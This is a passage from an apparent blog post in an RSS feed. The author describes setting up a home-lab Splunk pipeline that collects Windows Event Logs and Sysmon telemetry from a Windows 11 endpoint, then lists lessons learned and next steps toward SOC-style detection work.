&lt;p&gt;With the correct &lt;code&gt;inputs.conf&lt;/code&gt; in place, I generated some activity on the endpoint and went back to Splunk Web on the Xubuntu VM to check.&lt;/p&gt;

&lt;p&gt;In &lt;strong&gt;Search &amp;amp; Reporting&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;index=*
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Windows Event Log data was there.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fmvusq5sq27zq0ixp14ro.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fmvusq5sq27zq0ixp14ro.png" alt="Splunk Search &amp;amp; Reporting on Xubuntu showing Windows Event Log data returned by an index=* search after correcting the inputs.conf issue" width="800" height="431"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pipeline confirmed, end to end:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Windows Event Logs
       ↓
Splunk Universal Forwarder
       ↓
TCP 9997
       ↓
Splunk Enterprise
       ↓
Splunk Search
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  6. Expanding Endpoint Telemetry with Sysmon
&lt;/h2&gt;

&lt;p&gt;Standard Windows Event Logs get you a baseline, but they're limited for anything resembling real investigation work. Sysmon fills that gap: process creation, network connections, and more, depending on the config in use.&lt;/p&gt;

&lt;p&gt;I added the Sysmon Operational channel to &lt;code&gt;inputs.conf&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="nn"&gt;[WinEventLog://Microsoft-Windows-Sysmon/Operational]&lt;/span&gt;
&lt;span class="py"&gt;disabled&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Restarted the Forwarder:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;Restart-Service&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;SplunkForwarder&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generated some activity, checked Splunk again.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9vk38i1s5cwd948r7lqv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F9vk38i1s5cwd948r7lqv.png" alt="Splunk Search &amp;amp; Reporting on Xubuntu showing Sysmon event data, including process creation events, from the WIN11-TARGET endpoint" width="800" height="430"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sysmon Event ID 1 alone (process creation) already gives a lot more to work with than a generic Windows log entry. It's the difference between knowing &lt;em&gt;something&lt;/em&gt; happened and knowing &lt;em&gt;what process&lt;/em&gt; did it, &lt;em&gt;when&lt;/em&gt;, and &lt;em&gt;from where&lt;/em&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  7. What I Took Away From This
&lt;/h2&gt;

&lt;p&gt;The setup itself wasn't hard. The useful part was everything around the mistake.&lt;/p&gt;

&lt;p&gt;Configs can look correct and still be wrong. &lt;code&gt;inputs.conf&lt;/code&gt; became &lt;code&gt;inputs.conf.txt&lt;/code&gt; without any error, warning, or indication that something had gone sideways. The file looked fine in Notepad. It just wasn't the file Splunk was reading. That's a cheap lesson to learn on a home lab and a much more expensive one to learn on the job.&lt;/p&gt;

&lt;p&gt;Isolating the failure mattered more than fixing it. Checking network reachability before touching Splunk's config saved me from chasing the wrong problem. If &lt;code&gt;Test-NetConnection&lt;/code&gt; had failed, I'd have known immediately the issue was on the SIEM side or somewhere in between, not in a config file.&lt;/p&gt;

&lt;p&gt;And more logs isn't the same as more capability. Sysmon gives me a lot more raw material to work with, but a pile of events sitting in an index doesn't do anything on its own. That's the next problem to solve, not this one.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. Current Lab State
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;SIEM&lt;/strong&gt;&lt;br&gt;
Xubuntu, Splunk Enterprise, receiving on TCP &lt;code&gt;9997&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Endpoint&lt;/strong&gt;&lt;br&gt;
Windows 11, Splunk Universal Forwarder, Windows Event Logs + Sysmon&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Telemetry flow&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Windows 11 -- Windows Event Logs -- Sysmon -- Splunk Universal Forwarder -- TCP 9997 -- Splunk Enterprise (Splunk Search &amp;amp; Reporting)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The pipeline works. Right now it's collecting logs, not doing anything with them. That's the actual gap to close next.&lt;/p&gt;

&lt;h2&gt;
  
  
  Next Steps
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Build SPL searches against the Windows and Sysmon data actually sitting in the index.&lt;/li&gt;
&lt;li&gt;Turn some of those searches into detections instead of one-off queries.&lt;/li&gt;
&lt;li&gt;Put together dashboards for endpoint activity.&lt;/li&gt;
&lt;li&gt;Bring Kali Linux into the lab as a controlled attack source.&lt;/li&gt;
&lt;li&gt;Generate activity against the Windows endpoint and see what it actually looks like in Splunk.&lt;/li&gt;
&lt;li&gt;Use that telemetry to investigate, not just observe.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Right now this is a working log pipeline. The next few articles are about turning it into something that behaves more like a SOC.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>security</category>
      <category>showdev</category>
    </item>
  </channel>
</rss>
